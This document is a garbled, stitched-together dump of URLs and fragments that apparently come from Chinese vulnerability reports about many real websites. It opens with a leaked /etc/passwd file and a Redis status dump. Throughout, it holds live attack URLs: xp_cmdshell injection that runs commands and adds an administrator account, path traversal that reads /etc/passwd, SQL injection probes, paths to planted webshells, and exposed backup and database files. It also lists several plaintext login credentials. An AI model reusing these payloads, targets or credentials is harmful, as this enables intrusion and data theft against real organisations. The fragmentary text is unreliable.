vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ganglia:x:100:101:Ganglia System:/var/lib/ganglia:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nagios:x:101:102:nagios:/var/log/nagios:/bin/sh apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin openvpn:x:102:103:OpenVPN:/etc/openvpn:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin backuppc:x:103:107::/var/lib/BackupPC:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:104:108:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin ntop:x:105:109:ntop:/var/lib/ntop:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hacluster:x:106:110::/opt/NeoShineHA/lib/heartbeat:/bin/false oracle:x:500:502::/oracle:/bin/bash zabbix:x:501:503::/home/zabbix:/bin/bash http://lcse.lenovo.com.cn/RPS/GetJson/Proc_PerInfo.ashx?method=addFavorite&personId=1&loginId=1&focusType=1&n=0.31630329026691173 http://**.**.**.**/company/index.php?item=commit_message&member_id=73 http://www.kingcms.com/download/k9/。虽然官网下载的是9.00.0018,但是安装完成后,可以在后台在线升级,升级成最新版9.00.0019,最新版的cms就存在这个漏洞,这是新版本新增功能带来的漏洞。 http://www.focuznet.com/k9/t3012/ (特别是安装的后面部分操作) http://cloudytrace.com/这是网址 http://bbs.jzq001.com/plugin.php?classid=1851&fileext=1&id=mall&type=shop_search&typeid=1857 http://wt.wodexiangce.cn/changePassword.faces?date=20150904201648&useremail=chenlin@photo.wdxc.cn http://wt.wodexiangce.cn/changePassword.faces?date=20150904201648&useremail=admin@wodexiangce.cn http://wt.wodexiangce.cn/changePassword.faces?date=20150904201648&useremail=service@wodexiangce.cn user:tomcat pass:tomcat user:tomcat pass:tomcat user:admin http://mall.jzq001.com/ http://mall.jzq001.com/forum.php?mod=viewthread&tid=47084 http://coral.qq.com http://**.**.**.**/default/faqs/category/category_id/10* http://**.**.**.**/,页面找到“道路业户”,点击进去后,找到注入点 http://www.51langtu.com/ http://123.147.164.34:8080/ http://123.147.164.34:8080/File/ http://123.147.164.64:8083/wom/wom/test_checkInface4G.action http://**.**.**.**/aboutus.jsp?xwid=17&lmmc=dd_gsgk http://**.**.**.**/info_pagelist.jsp?page=1&lmmc=dd_gsxw&plmjc=xwzx&xwid=12553放入sqlmap检测,如图所示: http://www.cetools.cn/ index.php/cetools/passwordmodi www.cetools.cn http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 http://**.**.**.**/message.asp?id=2893 http://**.**.**/SysLoginAction!login.do http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/DBMS/LBS_Manager/UserManager.aspx?HoldID=79139 http://**.**.**.**/DBMS/LBS_Manager/AddUserInfo.aspx?ParentHoldID=79139&holdID=79139&userID=34346 http://**.**.**.**/ http://**.**.**.**/show.php?id=18382&catid=8 http://**.**.**.**/Images/UpPhoto/sjtu/10248715********2.jpg http://**.**.**.**/info/index.asp,发现该数码公司客户不止交大一家,而是遍及上海近百高校(疑似学校指定的拍照点)。 http://219.143.213.189/ http://mail.wyn88.com/ https://218.94.7.120/prx/000/http/localhost/login https://218.94.7.120:8888/ https://218.94.7.120:9888同样是array的登陆口,应该都是负责管理vpn的 https://218.94.7.120:9888 https://218.94.7.120/prx/000/http/localhost/login user:tomcat pass:tomcat http://**.**.**.**/news_2015.aspx?vDjbh=XWLB150812-0001 http://**.**.**.**/menpiaonew_list.aspx?vM_jdbm=JDLB20120730-0016 http://**.**.**.**/xianlusearch.html?xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF http://**.**.**.**/xianlu_list.aspx?vM_jdbm=XLLB150820-0002 http://**.**.**.**/venues_2015.aspx?vBM=YCCG20120714-0007 http://**.**.**.**/xianlusearch.aspx?xlfl=%25u533a%25u5916%25u7ebf%25u8def http://mapi.kaoyan.com/user/login http://**.**.**.**/bugs/wooyun-2014-073399 http://wooyun.org/bugs/wooyun-2015-0128066 http://sso.wy-fund.com/forget_password http://**.**.**.**:8081/hbtproject/user/userLogin.do http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://**.**.**.**/iufotempfile/fbwe81h8vkdvn67w17qot90y6u9s46/utl_webshell_101253.jsp www.ailvxing.com http://www.xmeye.net/login.do?method=goLogin http://www.xmeye.net/mydevice.do?method=edit&id=2107495 http://**.**.**.** http://www.huifund.com http://my.huifund.com:7001/etrading/ https://my.huifund.com/etrading/ http://my.huifund.com:7001/console http://www.youku.com/playlist_show/id_26051337.html http://i.youku.com/u/playlists http://**.**.**.** http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189 http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189 http://dlms.bhmc.com.cn/ilearn/getTydAfterSalesList.action?tydId=891572 http://ess.cninsure.net/product/common/cvar/CExec.jsp http://corp.octmami.com:443/includes/config.php.bak http://121.43.234.12/includes/config.php.bak http://w.octmami.com:443/includes/config.php.bak http://121.43.234.12:443/classroom.php?item=14 http://w.octmami.com:443/classroom.php?item=35 http://m.octmami.com/detail/index?goods=583 http://manage.st.octmami.com/wap/detail/index?goods=1031 http://st.octmami.com:80/wap/detail/index?goods=472 octmami.com/octmami2013 http://fair.st.octmami.com/admin.php http://**.**.**.**/article.php?art_id=32 redis_version:2.8.9 redis_git_sha1:00000000 redis_build_id:a16959dddb832cc8 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.7.2 process_id:2027 run_id:c189108802aa74eb3f85b5f056b76809d2c04889 tcp_port:6379 uptime_in_seconds:21487156 uptime_in_days:248 lru_clock:15335148 config_file:/etc/redis/6379.conf used_memory:982712 used_memory_human:959.68K used_memory_rss:1462272 used_memory_peak:1072184 used_memory_peak_human:1.02M used_memory_lua:33792 mem_fragmentation_ratio:1.49 mem_allocator:jemalloc-3.2.0 rdb_last_save_time:1441397860 total_connections_received:823 total_commands_processed:25239094 expired_keys:2110224 keyspace_hits:18748445 keyspace_misses:4379067 latest_fork_usec:316 role:master repl_backlog_size:1048576 used_cpu_sys:16250.48 used_cpu_user:7414.62 used_cpu_sys_children:0.05 used_cpu_user_children:0.01 db0:keys=1,expires=1,avg_ttl=12982 http://feedback.bj.oupeng.com/ http://www.okpay.com.cn/Default.aspx http://122.228.157.181/gps/ http://t.cn/RyLccPc https://cndms.ztems.com/P49A3_Try_WebService/TMService.asmx/InitDownPack http://121.40.81.22 http://121.40.81.22/company/company/add/id/23.html http://121.40.81.22/company/company/add/id/4.html http://121.40.81.22/company/member/add/id/835.html可确定,有835人 http://ba.hisuzhou.com/filsys/security/login.jsp http://115.238.166.123/cgi-bin/test-cgi http://115.238.166.123/cgi-bin/test-cgi http://m.modernsky.com/index.php?m=User&a=edit_address&id=2830 http://m.modernsky.com/index.php?m=User&a=edit_address&id=2831 http://www.mihoyo.com/hsod2_homepage/news.php?id=6 http://www.zhongyuanauto.com/list.php?id=9 http://u.job168.com/ http://u.job168.com:80/ inurl:/weathermap/weathermap-cacti-plugin.php http://**.**.**.**/plugins/weathermap/weathermap-cacti-plugin.php http://**.**.**.**/graph_view.php?action=tree&tree_id=1&leaf_id=917 http://**.**.**.**/cacti/plugins/weathermap/weathermap-cacti-plugin.php http://**.**.**.**/cacti/plugins/monitor/monitor.php http://**.**.**.**/cacti/graph_view.php?action=preview&host_id=74 http://**.**.**.**/cacti/plugins/superlinks/superlinks.php?id=8 http://**.**.**.**/cacti/graph_view.php?action=tree&tree_id=5&leaf_id=86&select_first=true http://**.**.**.**/plugins/weathermap/weathermap-cacti-plugin.php?action=viewmap&id=07e7c05977f2a66cdba1 http://**.**.**.**/graph_view.php?action=tree&tree_id=1&leaf_id=917 http://**.**.**.**/plugins/weathermap/weathermap-cacti-plugin.php?action=viewmapcycle http://112.4.17.117:10007/menberInfo?act=setPasswordNew http://112.4.17.117:10017/VFC/mail/useMail https://cn.toursforfun.com/account_edit.php#my-information https://cn.toursforfun.com/account_edit.php http://cn.toursforfun.com/address_book.php?action=add http://cn.toursforfun.com/address_book.php?action=add http://**.**.**.**/?a=get_all_phonenum&g=wap&itemid=45 http://www.metroshield.com:8080/vmain/login.jsp http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27net%20start%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27REG%20query%20HKLM\SYSTEM\CurrentControlSet\Control\Terminal%22%20%22Server\WinStations\RDP-Tcp%20/v%20PortNumber%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27net%20user%20wooyun%20wooyun%20/add%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27net%20localgroup%20administrators%20wooyun%20/add%27 www.metroshield.com:50510 ftp://116.10196.221/ http://m.modernsky.com http://m.modernsky.com/index.php?m=User&a=edit_identities&id=28401 http://m.modernsky.com/index.php?m=User&a=edit_identities&id=28400 http://www.hlyqr.com/diary/show/id/234*.html http://**.**.**.**/homeAction/homeAction.action http://**.**.**.**/bak.jsp http://www.cetools.cn/index.php/example/show_one?id=3707 index.php/example/show_one?id=3707 www.cetools.cn http://**.**.**.**:9080/PriceQuery?shipperCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&conCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&shipperCounty=%25E8%25A5%25BF%25E5%259F%258E%25E5%258C%25BA&conCounty=%25E4%25B8%259C%25E5%259F%258E%25E5%258C%25BA&ebProductTypeId=100000&t=1441445465464 http://**.**.**.**/05xgnew/Default.aspx http://**.**.**.**/ http://**.**.**.**/.svn/entries http://www.bsdimp.net/ http://203.187.185.142/cjcs/ztzb.do?actionType=changelabel&labelId=16&webId=18 http://203.187.185.142/cjcs/message/ http://203.187.185.142/cjcs/webEdit/ http://203.187.185.142/cjcs/information/ http://o.bjucd.com/wui/theme/ecology7/page/login.jsp?templateId=21&logintype=1&gopage=&message=16 http://**.**.**.** http://**.**.**.**:8399/Gis6/roadstate/info.do http://cemftp.ce-air.com http://doc.metinfo.cn http://doc.metinfo.cn/admin456/ http://www.wooyun.org/bugs/wooyun-2015-0139080/trace/d17d269bc5bd840e6e603ae160f10cea http://doc.metinfo.cn/wooyun.php http://www.metinfo.cn/woo.php http://www.metinfo.cn/wooyuntest.php http://new.bbs.metinfo.cn/wooyuntest.php metinfo.cn/upload/file/ http://cemftp.ce-air.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://cemftp.ce-air.com/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://cemftp.ce-air.com/yyoa/createMysql.jsp http://cemftp.ce-air.com/yyoa/ext/trafaxserver/SystemManage/config.jsp http://www.scyg.gov.cn/office http://182.150.21.212/ http://221.237.155.222:6879/ifs/ https://111.202.69.38/icbc/perbank/index.jsp http://111.202.69.38:88/login.aspx?ReturnUrl=%2f http://111.202.69.38:8080/login/Login.jsp?logintype=1 view-source:http://111.202.69.38:8080/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../C:\\Windows\\System32\\drivers\\etc\\hosts http://m.niiwoo.com/regist.html http://m.niiwoo.com/lottery/html/regist/login.html http://www.tuandai.com/ http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/ebank/accountmanage/foreign/Khdzd.jsp?tsStart=2015-05-01&tsEnd=2015-05-28&lAccountID=21399&lAccountIDCode=010100000742&lCurrencyID=2 http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/ebank/accountmanage/foreign/Khdzd.jsp?tsStart=2015-05-01&tsEnd=2015-05-28&lAccountID=21401&lAccountIDCode=010100000742&lCurrencyID=2 http://**.**.**.**/loginAction_login.do http://**.**.**.**:8080/sdk/SDKService?wsdl http://www.job168.com/train/course.jsp?all=on&course_no=1 http://dhl.kaiyuan.eu/admin.php?action=login http://x.1mxian.com/records http://106.120.158.40/ http://106.120.158.40/Patent/PatentDetailView.aspx?action=view&ShowAction=1&Workflow=true&MngNo=201402156&MngNoType=1 http://106.120.158.40/Patent/PatentDetailView.aspx?action=view&ShowAction=1&Workflow=true&MngNo=201402154&MngNoType=1 http://106.120.158.40/Patent/PatentDetailView.aspx?action=view&ShowAction=1&Workflow=true&MngNo=201402153&MngNoType=1 http://err.1mxian.com:9200/_status http://err.1mxian.com:9200/_nodes http://err.1mxian.com:9200/_search?pretty http://err.1mxian.com:9200/_plugin/head/ http://friendlink.tuanche.cn/login http://sjs.yihaojiaju.com/audit/statistics.aspx http://pk.baofen.ali213.net/login?id=51 http://www.ailvxing.com/e/member/login/ http://www.ns.gf.com.cn:80/collect/web/PersonInfoAction.go?function=GetBranchPersonInfo&view=v_ryxx_jjxs&branchId=1704 http://weibo.gf.com.cn/config http://121.14.2.38/libs http://www.dns0755.net:80/ www.dns0755.net http://open.ab95569.com https://passport.sohu.com/user/tologin?bru=http%3A%2F%2Fmp.sohu.com%2F%3Ftip%3D1 http://www.igocctv.com/igo/weixin/login.action http://124.162.20.54/weisvr/jmxroot.jsp https://ebank.hkbea.com.cn/perbank/PTR0203001_saveAdToImg.do?EMP_SID=xxxxxxxxxxxx&fileFtpPath=/etc/hosts https://ebank.hkbea.com.cn/perbank/PTR1702002_query_detail_By_FlowNo.do?EMP_SID=xxxxxxxxxxxx&fileFtpPath=/etc/passwd http://www.ailvxing.com/ http://medical.neusoft.com:80/ http://**.**.**/ http://cms.sangfor.com:8888/pma/ URL:http://**.**.**.**/stat/stat.aspx?code=0&statid=740507330429%27%3B&come=&width=1280 https://itsm.30wish.net/occ/.svn/entries http://192.168.33.52/svn/occ http://192.168.33.52/svn/occ https://itsm.30wish.net/occ/email_upload_file/KB2014060002.pdf http://211.144.131.98/ https://211.144.131.98:9043/ibm/console/ http://drops.wooyun.org/tips/604 http://211.144.131.98:9080/safe_test/index.jsp http://211.144.131.98:9080/safe_test/cdm.jsp http://www.lushanly.com/news.php?a_id=3&b_id=17&c_id=244 http://www.koowo.com/forum/ http://www.dc-cloud.com/wp-admin/ http://bj.gtja.com/gt/ajax/login.ashx http://oa.juneyaoair.com/weboa/webpage.nsf/GeneralOffice?OpenForm http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://service.sflep.com/ ttp://old.club.xywy.com:80/yszs/expert_online.php?toa=1&type=data&uid=8727577&online=0 http://**.**.**.**/ http://58.61.28.185:6666//invoker/EJB system:type=ServerInfo http://**.**.**.**/bugs/wooyun-2010-0109320 http://oa.baihe.com:7788/ http://oa.baihe.com:7788/is/ http://www.gzekt.com/admin/bsPaytype_updateBeforeBusiSupPaytype.action?busicode=100001&paytype=12&businame=%253C%253E http://www.gzekt.com/admin/bsPaytype_queryBusiSupPaytypeAll.action?busicode=100001&businame=%E5%A4%87%E4%BB%98%E9%87%91%E5%85%85%E5%80%BC http://www.gtafe.com/ https://m.gtafe.com/owa/ http://d.gtafe.com/os/login.html https://vpn.gtafe.com/ http://oa.gtadata.com/C6/Jhsoft.Web.login/PassWordNew.aspx http://bbs.fund123.cn/。发现可以插入图片。 http://www.kangq.com/ http://**.**.**.**//adminplan/shangchuan.asp,此页面在上传过程中,将上传路径直接写入客户端: http://**.**.**.**/ http://**.**.**.**/Default/Download http://www.ab-insurance.com/job_info.asp?id=936,这里没过滤 http://www.hp1997.com/passport/login.aspx http://www.childol.com.cn/home/ http://www.childol.com.cn/new/Login.aspx http://www.childol.com.cn/new/Message_ViewDetail.aspx?NoticeID=2227273#MenuArea http://www.childol.com.cn/new/Archive_ShowTeacher.aspx?UserID=19258#MenuArea http://www.xintai.com http://www.xintai.com/uddiexplorer/SetupUDDIExplorer.jsp http://www.xintai.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.27.24.69:9001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://fang.58.com/ http://fang.58.com/ajax/upload.php?input=pic1&img=img1 https://github.com/lengy/python_simple_model/blob/b4d9825683267882d99eeda41e70bd434406feed/setting/database.py http://**.**.**/oa/upfile/SavePath/ http://chexian.sinosig.com/carPremium/lotteryIndex.action http://chexian.sinosig.com/carPremium/InsList.jsp url:http://58.251.33.179:80/manager/html user:tomcat pass:tomcat http://58.251.33.179/wooyun/ http://**.**.**.**:8888 http://oa.beequick.cn:89使用的是泛微oa的e-Mobile系统,存在注入漏洞。 http://**.**.**.**:8090/xmsb/indexAction!to_index.action http://**.**.**.**:8090/xmsb/indexAction!to_index.action?redirect:http://**.**.**.** http://**.**.**.**:8090/xmsb/indexAction!to_index.action?redirect:${2*4 http://www.bnchina.com:8080/queryTblScorehistory.do?hongru_username=1066&hongru_accountId=1066 http://www.bnchina.com/user/login/ http://www.fmi.com.cn/index.php?a=init&typeid=1&c=index&catid= http://202.108.145.86/ http://111.202.69.70/manager/html/ http://111.202.69.80/manager/html/ http://m.koyimall.com/?act=shop.goods_list&GC=GD00&oc=good_buy_total&os=desc&page=4&ST=SCODE3&mode= http://joygormusic.ztems.com/,九歌音乐管理系统: http://m.chinaxinge.com/android/newsview.asp?id=93513 http://www.yongcheng.com/ http://**.**.**/ http://218.25.10.196/weidigps/servlet/GetCarPos?carid=100199,100200,100277,100286,100309,100288,100285,100279,100281,100289,100305,100287,100198,100323,100278,100275,100196,100197,100280,100283,100284,100282,100202,100259,100311,100276,100258,100118,100261,100306,100307,100310,100324,100312,100308,100119,100120,100260,100117 http://220.181.23.80/WEB-INF/classes/struts-config.xml dckf.digitalchina.com/index.php/qa/qalist http://jspxxy.xbjsyx.com/web/index.php?webid=jspxxy http://www.shbtp.com.cn/ http://gd.189.cn/dwr/exec/WebPayCommonDwr.getCustName.dwr?callCount=1&c0-scriptName=WebPayCommonDwr&c0-methodName=getCustName&c0-param0=boolean:false&c0-param1=boolean:false&c0-param2=string string:CDMA&c0-param4=string http://gd.189.cn/dwr/exec/WebPayCommonDwr.getCustName.dwr?callCount=1&c0-scriptName=WebPayCommonDwr&c0-methodName=getCustName&c0-param0=boolean:false&c0-param1=boolean:false&c0-param2=string:85658135&c0-param3=string:CDMA&c0-param4=string:020&xml=true, http://www.ailvxing.com/e/visa/index.php/?enews=showsample&subid=59 http://**.**.**.**/bugs/wooyun-2010-096034 https://github.com/lixingming/my-crm/blob/20126c42c1bb192a561c0b2e5170139090acdec7/src/main/java/com/b5m/util/mail/SendMailDemo.java http://111.161.24.187/adm/ liming:123456 wangxueyun:wangxueyun http://**.**.**.**/news_videos.jsp?classId=0207 http://**.**.**.**:8000/ http://www.dcbf.com.tw http://www.dcbf.com.tw/html/news.php?type=F http://www.dcbf.com.tw/script/syslogin.php cc64:b3fb:7b88%10 http://**.**.**.**/do/login http://elreport.ce-air.com/login.do,这是东航 http://daxue.imooc.com/ http://mail.edm.hysec.com:8087/login/login.action http://mail.edm.hysec.com:8087/wooyun.jsp http://m.koyimall.com http://www.koyimall.com http://www.koyimall.com/?act=shop.goods_list&GC=GD0H&oc=good_buy_total&os=desc&page=1&ST=&mode=&list_num=24 http://wap.bocichina.com:80/wap2stock/info.do?classid=1001&id=16228 http://t.gfan.com:8080/ http://zsb.hrbcu.edu.cn http://zsb.hrbcu.edu.cn/xsc http://zsb.hrbcu.edu.cn/xsc/style/in_out%20%281%29.sql http://61.132.51.102:80/index_fund.jsp?pageSize=10&pageNo=1&jjlxnum=1&1=1&model=undefined&order=d002_003&jjlx=006 http://research.sflep.com/PaperSets.aspx?typeId=1 http://www.y1s.cn/index.php?a=waterfallload&bid=1&g=home&m=case&p=1&sid=-1&zid=-1&_=1441387377969 http://mail.chinaexpressair.com/ http://222.178.225.45:10080/ http://prepare.chinaexpressair.com/admin/login.aspx http://oa.g5air.com/ http://wx.foundersc.com/../../../../../../../../etc/passwd http://**.**.**.**/module/index.jsp http://group.airchina.com.cn/ http://meng.paojiao.cn/ http://oa.zxxk.com/ http://mail.xkw.cn/ http://dsyy.13980.com/createImageAction.action http://ac.haidilao.com http://dhl.kaiyuan.eu/admin.php?action=login http://www.boci.com.hk/chi/spec/spec.zip http://cms.kingdee.com/hotNewsList.do?catalog=%D0%C2%CE%C5%D7%A8%CC%E2&column=1&curPage=1&days=2&more=true&new=true&perPages=4&topic=%B8%DF%B7%E5%BB%E1%D5%EF%C8%C8%B5%E3%D0%C2%CE%C5 http://**.**.**.**/ http://**.**.**.**/gjj_temp/gjj_select.asp http://www.99fenqi.com官网 https://**.**.**/liuj***21/quartz/blob/ea61e1f6d***00c9263f81208f3/springQuartz/WebRoot/WEB-INF/applicationContext1.xml jdbc:mysql://115.**.*.**/test?useUnicode=true&characterEncoding=UTF-8 http://221.3.143.66:8090/ http://goto.mail.sohu.com/goto.php?code=sogoubanner-wenda http://goto.mail.sohu.com/goto.php?code=sogoubanner-wenda%df https://app.szeastroc.com http://oa.szeastroc.com:89/login.do https://mail.tcl.com http://www.pengpengmall.com/account/buyer/orderDetail.html?order_id=3818101 http://www.pengpengmall.com/account/buyer/orderDetail.html?order_id=3819001 http://www.pengpengmall.com/account/buyer/orderDetail.html?order_id=3852321 http://vip.ufida.com.cn/nccsm/ http://nczx.yonyou.com/SubModule/role/ http://nczx.yonyou.com/SubModule/ http://nczx.yonyou.com/Inc/ www.xiaozhu.com http://**.**.**/tnet/login.jsp http://**.**.**/tnet/attachment/15090708574923043531.jsp_ http://www.7caihua.com/ http://m.jindanlicai.com/distribution/distr_index?u_id=213250&ac_id=11&ck=22300596d16ecaffdf8c986ffd3961bd&openid=o8AH_tkLyo8qcCRzCb00lrNfWLck http://medical.neusoft.com:80/en/searchresult.jsp http://medical.neusoft.com:80/en/searchresult.jsp?keywords=135791&srchfield=135791-ROW_COUNT%28%29-%28-ROW_COUNT%28%29%29 www.xiaozhu.com http://servexpress.digitalchina.com/sms/reg/login.asp http://servexpress.digitalchina.com/DellSOS/ http://servexpress.digitalchina.com/DellSOS/onsite/onsite_service_inf.aspx?serno=80900380052(不知道这算不算越权) http://www.secwk.com/petition/info/taskid/132*.html http://www.secwk.com/petition/info/taskid/132*.html http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false http://**.**.**.**/ http://imall.pflife.com.cn http://www.ehaier.com/madmin/product/productsList.html http://**.**.**.**/mpa/detail.php?resourceid=910 http://**.**.**.**/ArticleQueryViews.do?title=2014&siteId=63 http://**.**.**.**/upload/2015/09/07/2015-09-07-11-14-591315933610.jsp http://xmsstst1.sinochem.com/vendorlogin.aspx?ReturnUrl=http://vendorms-dev01.sinochem.com/index.aspx http://**.**.**.**:80/feedback.php?cat_id=100&pid=53 http://**.**.**.**//find.php?cat_id=1%27&pid=13 http://**.**.**.**//productconent.php?cat_id=49&id=220&pid=28 http://www.chinaerdos.com/chinese/feedback/admin/ http://www.chinaerdos.com/chinese/hr/admin/ http://www.chinaerdos.com/chinese/bidding/admin/ http://www.chinaerdos.com/chinese/faq/admin/ http://www.chinaerdos.com/chinese/news/admin/vedio/ http://jindanlicai.com/ https://api.jindanlicai.com/v2/ www.matao.com)安卓商店里有个app http://bbs.kisslink.com/utility/convert/index.php http://m.yaofang.cn/user/addAddress/1164324 http://home.exam8.com/teachercomment.php?do=show&teacherID=1 Table_Num:142 Data:307158922 http://**.**.**.**/cblcn/agency/searchlist http://**.**.**.**/zbw/zbxx/zbgg/tjgglb_search.jsp http://club.kingdee.com/forum.php?action=recommend&do=subtract&hash=8e01bc2c&mod=misc&tid=1 http://codex.wordpress.org/zh-cn:%E7%BC%96%E8%BE%91_wp-config.php http://www.hlslm.cn/Home/User/login.html http://www.jzq001.com/ http://expense.juneyaoair.com:8080/Frame/login.aspx www.xin.com http://www.y1s.cn/index.php?a=index&g=home&m=business&sid=1'%22 http://122.97.17.92/永诚财产保险电子商务网站 http://**.**.**.**/Article.asp?id=2973 http://www.topsrx.com/index.php?m=default&c=page&a=detail&name=Company%20Profile http://www.flyertea.com/plugin.php?id=it618_scoremall:scoremall_uc&cid=4 http://sns.fotile.com/member.php?mod=register http://marking.hunantv.com/dabenying/admin/ http://oa.china-sss.com/defaultroot/login.jsp http://mail.amac.org.cn/ http://www.qingniancaijun.com.cn/index.php?route=product/product&product_id=132 http://www.qingniancaijun.com.cn/index.php?route=product/product&product_id=132 http://www.qingniancaijun.com.cn/index.php?route=product/product&product_id=132 http://**.**.**.**/ http://y1s.cn/index.php?g=home&m=zone&a=detail&zoneId=162 http://zyz.scbz.com/guest/index.action http://**.**.**.**/User/Login.aspx?ReturnUrl=%2fUser%2fDefault.aspx是动易的,随便用动易的默认用户名:admin,密码:admin888登录,结果还真进去了。里面可以找到添加的模块,还有上传点,接下来你懂的。 http://meeting.chec.com.cn/Conf/jsp/user/loginAction.do http://**.**.**.**/Download.asp页面中的BigClassName参数存在cookie注入漏洞,程序在获取该参数值时未指定request获取方法。详细利用见漏洞证明。 http://www.flyertea.com/plugin.php?id=it618_scoremall:scoremall_uc&cid=4 http://cms.kingdee.com/moreNews.do?catalog=%3f%3f%3f%3f%3f%3f%3f&curPage=1&topic=%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f&totalPages=382 http://cms.kingdee.com/services/faq/question_main.jsp http://cms.kingdee.com:80/ http://59.46.94.68/ http://scm.life.1mxian.com/orders/instorage http://www.cfp.cn/index/mjjd?lid=0&outid=401160952&type=showmid http://**.**.**.**/cn/about/MediaCenter/MediaPic.aspx?brandid=1 http://sxspzx.sxu.edu.cn/signup/login.htm http://**.**.**.**/News_Text.php?class_id=5&id=454 http://dp.chuchujie.com/ http://www.mdjmu.cn/jy/dapqcx/data/data2014.mdb http://www.mdjmu.cn/jy/dapqcx/data/databack.mdb http://www.mdjmu.cn/jy/dapqcx/data/data.mdb http://www.mdjmu.cn/jy/dapqcx/data/data1.mdb http://www.mdjmu.cn/xxgkw/huizhi/adminlogin.asp www.mdjmu.cn http://www.xiaoyi.com http://weixin.juneyaoair.com/mphone/orderDetail.html?OrderNo=(此处为单号) http://weixin.juneyaoair.com/mphone/orderDetail.html?OrderNo=ORD15042202269436 http://weixin.juneyaoair.com/mphone/orderDetail.html?OrderNo=ORD15042202269437 http://**.**.**.**/show.asp?id=5894 http://bbs.woool.17qiqu.com/uc_server/ http://t.bbs.dodoca.com/ PHP:Linux http://www.yingchuang.com/search/orderdetail/?oid=00043269 http://www.yingchuang.com/search/orderdetail/?oid=00043269 http://www.yingchuang.com/search/orderdetail/?oid=00043269 http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0 http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0 http://mail.east.net/webmail/ www.jobshow.cn http://www.jobshow.cn/replay/findReplay?postId=474 http://t.bbs.dodoca.com/uc_server/admin.php https://www.95598pay.com/rest/hxindividualuserinfo/emailOpenUpdate https://www.95598pay.com/rest/hxindividualuserinfo/phoneOpenUpdate http://220.249.93.237/SCN/NewsDetail.aspx?ID=3509 http://222.190.152.234:84/doc/page/login.asp http://222.190.152.234:82/doc/page/login.asp http://**.**.**.**:88/hzgtjygkz/ygzz/list.action?nav0.id=32 https://www.qhee.com:443/ http://faxian.exam8.com/s/?s=123 com:8080 http://120.132.47.165/client_iprogram_vvs http://120.132.47.165/client_channel_vvs http://120.132.47.165/users http://www.haoxintuo.cn/orders/ http://plus.aili.com/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df%27 http://shell.cnfol.com/article/hwcode_newjson.php?id=1207&len=18&record=1 http://shell.cnfol.com/article/dynamic_newjson.php?id=955&len=18&record=4 http://112.126.71.228:81/ http://112.126.71.228:82/secure/Dashboard.jspa http://112.126.71.228:8090/login.action http://itfsy.cn/wooyun?site=docin&cookies= http://dz.pangu.us/search_case.php http://td.17m3.com//act/bug/ajax/ajaxprizelist.ashx?date=20140728 http://td.17m3.com//act/bug/ajax/ajaxprizelist.ashx?date=20140728” http://**.**.**.**/bugs/wooyun-2010-0130475 http://yimin.edai.com/order.php?orderby=immigrate%27 http://www.e-bridge.com.cn:80/ www.e-bridge.com.cn url:http://xinxifabu.renrenche.com/index.php?/auth/login user:laoyong@renrenche.com password:123456 http://222.178.110.157/cqtpsms/index.jsp 